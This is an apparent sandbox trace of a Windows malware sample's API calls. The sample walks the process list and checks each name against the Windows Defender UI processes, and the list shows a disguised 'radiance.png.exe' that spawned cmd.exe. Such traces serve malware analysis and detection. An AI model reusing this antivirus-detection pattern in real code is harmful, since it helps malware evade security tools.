	[0046.326] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0046.327] lstrcmpiW (lpString1="services.exe", lpString2="MSASCuiL.exe") returned 1
	[0046.327] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0046.329] lstrcmpiW (lpString1="lsass.exe", lpString2="MSASCuiL.exe") returned -1
	[0046.329] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0046.330] lstrcmpiW (lpString1="lsm.exe", lpString2="MSASCuiL.exe") returned -1
	[0046.330] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.331] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1
	[0046.331] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.333] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1
	[0046.333] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.334] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1
	[0046.334] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.336] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1
	[0046.336] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.337] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1
	[0046.337] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.339] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1
	[0046.339] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.341] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1
	[0046.341] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0046.344] lstrcmpiW (lpString1="spoolsv.exe", lpString2="MSASCuiL.exe") returned 1
	[0046.344] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.345] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1
	[0046.345] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0046.347] lstrcmpiW (lpString1="taskhost.exe", lpString2="MSASCuiL.exe") returned 1
	[0046.347] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0046.349] lstrcmpiW (lpString1="taskeng.exe", lpString2="MSASCuiL.exe") returned 1
	[0046.349] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0046.351] lstrcmpiW (lpString1="taskhost.exe", lpString2="MSASCuiL.exe") returned 1
	[0046.351] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.353] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1
	[0046.353] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0046.355] lstrcmpiW (lpString1="WmiPrvSE.exe", lpString2="MSASCuiL.exe") returned 1
	[0046.355] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0046.356] lstrcmpiW (lpString1="sppsvc.exe", lpString2="MSASCuiL.exe") returned 1
	[0046.356] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0046.358] lstrcmpiW (lpString1="dwm.exe", lpString2="MSASCuiL.exe") returned -1
	[0046.358] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.360] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1
	[0046.360] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0046.362] lstrcmpiW (lpString1="explorer.exe", lpString2="MSASCuiL.exe") returned -1
	[0046.362] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0046.370] lstrcmpiW (lpString1="audiodg.exe", lpString2="MSASCuiL.exe") returned -1
	[0046.370] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0046.371] lstrcmpiW (lpString1="WmiPrvSE.exe", lpString2="MSASCuiL.exe") returned 1
	[0046.371] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0046.373] lstrcmpiW (lpString1="shirts_cumshots_compaq.exe", lpString2="MSASCuiL.exe") returned 1
	[0046.373] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0046.375] lstrcmpiW (lpString1="league.exe", lpString2="MSASCuiL.exe") returned -1
	[0046.375] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0046.377] lstrcmpiW (lpString1="js_sound.exe", lpString2="MSASCuiL.exe") returned -1
	[0046.377] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0046.378] lstrcmpiW (lpString1="beast-dry.exe", lpString2="MSASCuiL.exe") returned -1
	[0046.378] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0046.381] lstrcmpiW (lpString1="forecastsgeographic.exe", lpString2="MSASCuiL.exe") returned -1
	[0046.381] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0046.383] lstrcmpiW (lpString1="reno.exe", lpString2="MSASCuiL.exe") returned 1
	[0046.383] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0046.385] lstrcmpiW (lpString1="specreformwear.exe", lpString2="MSASCuiL.exe") returned 1
	[0046.385] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0046.386] lstrcmpiW (lpString1="rr_publications.exe", lpString2="MSASCuiL.exe") returned 1
	[0046.386] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0046.387] lstrcmpiW (lpString1="solo.exe", lpString2="MSASCuiL.exe") returned 1
	[0046.387] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0046.389] lstrcmpiW (lpString1="beam.exe", lpString2="MSASCuiL.exe") returned -1
	[0046.389] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0046.390] lstrcmpiW (lpString1="configurations.exe", lpString2="MSASCuiL.exe") returned -1
	[0046.390] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0046.391] lstrcmpiW (lpString1="fact-film-anticipated.exe", lpString2="MSASCuiL.exe") returned -1
	[0046.391] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0046.392] lstrcmpiW (lpString1="wanting villages.exe", lpString2="MSASCuiL.exe") returned 1
	[0046.392] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0046.393] lstrcmpiW (lpString1="engagementresearchersmonkey.exe", lpString2="MSASCuiL.exe") returned -1
	[0046.393] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0046.395] lstrcmpiW (lpString1="surgical-marcus.exe", lpString2="MSASCuiL.exe") returned 1
	[0046.395] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0046.396] lstrcmpiW (lpString1="iexplore.exe", lpString2="MSASCuiL.exe") returned -1
	[0046.396] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0046.397] lstrcmpiW (lpString1="iexplore.exe", lpString2="MSASCuiL.exe") returned -1
	[0046.397] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="radiance.png.exe")) returned 1
	[0046.398] lstrcmpiW (lpString1="radiance.png.exe", lpString2="MSASCuiL.exe") returned 1
	[0046.398] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd50, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0046.399] lstrcmpiW (lpString1="cmd.exe", lpString2="MSASCuiL.exe") returned -1
	[0046.399] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0046.400] lstrcmpiW (lpString1="conhost.exe", lpString2="MSASCuiL.exe") returned -1
	[0046.400] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0
	[0046.401] CloseHandle (hObject=0x1d4) returned 1
	[0046.401] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x1a8
	[0046.417] Process32FirstW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0046.419] lstrcmpiW (lpString1="[System Process]", lpString2="MSASCui.exe") returned -1
	[0046.419] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0046.420] lstrcmpiW (lpString1="System", lpString2="MSASCui.exe") returned 1
	[0046.420] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0046.421] lstrcmpiW (lpString1="smss.exe", lpString2="MSASCui.exe") returned 1
	[0046.421] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0046.422] lstrcmpiW (lpString1="csrss.exe", lpString2="MSASCui.exe") returned -1
	[0046.422] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0046.424] lstrcmpiW (lpString1="wininit.exe", lpString2="MSASCui.exe") returned 1
	[0046.424] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0046.425] lstrcmpiW (lpString1="csrss.exe", lpString2="MSASCui.exe") returned -1
	[0046.425] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0046.426] lstrcmpiW (lpString1="winlogon.exe", lpString2="MSASCui.exe") returned 1
	[0046.426] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0046.428] lstrcmpiW (lpString1="services.exe", lpString2="MSASCui.exe") returned 1
	[0046.428] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0046.429] lstrcmpiW (lpString1="lsass.exe", lpString2="MSASCui.exe") returned -1
	[0046.429] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0046.430] lstrcmpiW (lpString1="lsm.exe", lpString2="MSASCui.exe") returned -1
	[0046.430] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.431] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1
	[0046.431] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.433] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1
	[0046.433] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.434] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1
	[0046.434] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.435] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1
	[0046.435] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.436] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1
	[0046.436] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.438] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1
	[0046.438] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.439] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1
	[0046.439] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0046.440] lstrcmpiW (lpString1="spoolsv.exe", lpString2="MSASCui.exe") returned 1
	[0046.440] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.442] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1
	[0046.442] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0046.443] lstrcmpiW (lpString1="taskhost.exe", lpString2="MSASCui.exe") returned 1
	[0046.443] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0046.444] lstrcmpiW (lpString1="taskeng.exe", lpString2="MSASCui.exe") returned 1
